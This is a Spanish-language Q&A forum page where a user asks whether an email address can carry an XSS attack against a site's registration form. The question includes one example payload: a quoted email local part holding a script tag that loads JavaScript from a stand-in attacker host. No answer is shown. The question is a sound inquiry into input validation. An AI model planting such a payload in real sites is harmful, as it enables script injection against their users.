¿Son posibles los ataques XSS a través de direcciones de correo electrónico?

Question

Jul 05, 2013, 05:53 AM

¿Son posibles los ataques XSS a través de direcciones de correo electrónico?

Me pregunto si una dirección de correo electrónico se puede utilizar para los ataques XSS.

Supongamos que hay un sitio web donde se puede registrar y da su dirección de correo electrónico. Si uno quiere atacar el sitio web dado, él o ella puede crear una dirección de correo electrónico, como esta:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

y luego usar esta dirección de correo electrónico para atacar el sitio web.

¿Se permite la cita o la etiqueta de script en una dirección de correo electrónico?

Respuestas a la pregunta(1)

Preguntas populares

0 la respuesta

matriz de control vb.net

0 la respuesta

Posting foto de iphone a facebook wall

0 la respuesta

¿Es legal la lista de inicializadores como esta en C ++ 11?

0 la respuesta

enviar correo electrónico con el remitente de copias GAE: ¿cómo detenerlo?

0 la respuesta

erlang: soporte de socket de dominio UNIX?

¡Eres muy activo! ¡Es genial!

¿Son posibles los ataques XSS a través de direcciones de correo electrónico?

Respuestas a la pregunta(1)

Su respuesta a la pregunta

Preguntas populares